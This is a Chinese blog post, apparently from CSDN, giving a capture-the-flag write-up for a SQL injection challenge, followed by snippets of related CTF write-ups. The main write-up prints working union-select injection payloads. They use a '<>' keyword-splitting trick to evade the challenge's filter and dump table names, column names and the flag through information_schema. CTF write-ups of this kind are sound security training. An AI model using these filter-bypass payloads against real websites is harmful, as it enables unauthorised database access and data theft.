百度杯”CTF比赛 九月场 SQL

最新推荐文章于 2022-05-17 21:10:50 发布
最新推荐文章于 2022-05-17 21:10:50 发布
阅读量299 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43858799/article/details/90346076
博客介绍了通过SQL注入获取flag的方法。先尝试常规SQL注入,发现‘order by’、注释等被拦截,通过用<>隔开字符绕过过滤。确定字段有3个后,使用union查询得到字段位置,再通过特定语句爆数据表、字段和数据,最后提交flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、打开题目 提示flag通过注入拿到
在这里插入图片描述
2、开始常规的进行SQL注入
在这里插入图片描述

输入‘ order by 1 发现被过滤了

字符&&和||替换进行替换and 和or
在这里插入图片描述

发现没有显示过滤

发现order by被拦截

同样注释/**/也会被拦截。尝试用<>把字符隔
开。这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符

所以使用 1 o<>rder by 1

发现没有被过滤 接下来就进行 常规的注入操作

得到字段有3 个
使用union查询 得到字段位置

1 un<>ion se<>lect 1,2,3 –
在这里插入图片描述
3、
?id=1 un<>ion se<>lect 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() – //数据
在这里插入图片描述
?id=1 un<>ion se<>lect 1,group_concat(column_name),3 from information_schema.columns where table_name =‘info’ – // 爆字段

在这里插入图片描述

?id=1 un<>ion se<>lect 1,group_concat(flAg_T5ZNdrm),3%20from%20info%20-- //爆数据
在这里插入图片描述

提交flag 即可

百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 497
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 894
百度CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
百度CTF比赛 九月 SQL
SPS98
11-02 371
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
百度CTF比赛 九月 SQLi
weixin_43858799的博客
05-19 817
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 677
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
SQL注入】CTF练习题WriteUp——“百度CTF比赛 九月SQL
Fighting_hawk的博客
05-17 3999
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
百度CTF比赛 九月 Web-Login
qq_34106499的博客
01-17 782
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
百度CTF比赛 九月 XSS平台
苟有恒,必有三更眠,五更起。
11-01 1755
百度CTF比赛 九月 XSS平台 登录页面,开始时尝试注入,没有明显效果,无法判断是否存在注入。 一时没了思路,看了大佬的 WP,发现大佬们是通过构造错误参数使得web报错,从而收集信息,算是又学习到了一招。 于是,在burpsuite里面构造错误参数,报错得到信息 image 报错信息中有一个rtiny 在github上找到相应 ...
百度CTF比赛 九月-web123题
weixin_46784800的博客
12-29 569
百度CTF比赛 九月-web123题 知识储备 敏感信息泄露 敏感信息泄露,是指存在一些备份文件未经处理,而保存在网站目录上,可以进行访问,获得一些信息。 网站备份文件泄露常见后缀: .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar 网站备份文件泄露扫描工具: Test404网站备份文件扫描器 v2.0(win) ihoneyBakFileScan(python) ​ ihoneyBakFile
百度CTF比赛 九月 sql
whisper_ZH的博客
09-22 208
进入题目 url中 id=1 瞩目 加上题目为sql对id为注入点开启搞! 小试以下,果然被过滤了… 开启burp看看哪些字被过滤!------果然该过滤的都过滤了。。。 具体大概过滤了 or ;and ;select ;order by ;url编码也不行-.- 试一下/**/分割关键字 无用… 头疼了很久,发现<>可以绕过,盲猜可能是设置了代码过滤...
百度CTF比赛 九月SQLi ---------mozhe
weixin_40709439的博客
08-25 1549
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
百度CTF比赛 九月_SQLi
a173262565的博客
04-20 128
题目在i春秋ctf大本营 看网页源码提示: 这边是个大坑,访问login.php发现根本不存在注入点,看了wp才知道注入点在l0gin.php 尝试order by语句,发现3的时候页面发生变化,说明id存在注入 初步判定是一个基于时间的盲注 直接上注入语句: 发现并没有发生延迟,看返回页面“,”后面的语句都被过滤了,这就说明逗号在这里不能用,那么if...
百度CTF比赛 九月_SQL
a173262565的博客
04-19 298
题目在i春秋ctf大本营 题目一开始就提醒我们是注入,查看源码还给出了查询语句 输入测试语句发现服务器端做了过滤,一些语句被过滤了 试了一下/**/、+都不行,后来才发现可以用<>绕过 接着就是常规注入语句,先order by判断一下,发现到4就没有回显了,接着上union select 接着直接一套combo带走 数据库: 表: 字段:...
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 377
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
[百度] 九月第二周 Sqli writeup
Flyour的博客
04-01 1857
这道sql注入题折磨了我相当久,痛哭流涕啊! 拿到题,访问url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url: http:...
百度CTF比赛 九月SQLi ---------i春秋
weixin_30907523的博客
07-07 152
题目链接:https://www.ichunqiu.com/battalion 打开链接,创建题目,进入题目环境 发现界面没有显示东西 查看一下源代码 发现源代码里注释了一条信息,login.php?id=1,访问一下 只返回了一条句子welcome admin~,尝试注入,结果没什么发现 进行抓包,访问index.php,在主界面获取到一个信息 刚开始以为和URL上...
i春秋 “百度CTF比赛 九月 SQLi
include_heqile的博客
09-13 1146
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题相当坑爹,我是看了writeup才知道该怎么做 进入题目链接后查看源代码,提示说注入点是login.php,但是这个注入点是假的,累死你也注不出来任何内容,看一下题目链接和点进去之后浏览器搜索框上的链接,两者其实是不一样的: 题目链接:http://bc9dbb2a422b452ca6bcdf...
百度CTF比赛 九月 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3951
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
百度CTF比赛 九月 SQLi
feng的博客
09-11 352
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
陇剑CTF解压教程:SQL注入技巧与access.log分析
总结以上知识点,可以看出"陇剑SQL注入.zip"文件涉及的内容广泛,既包括基础的文件压缩与解压操作,也涵盖网络安全领域的实战技能,特别是针对SQL注入这一具体攻击技术的深入了解和防御策略。参加此类CTF挑战,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值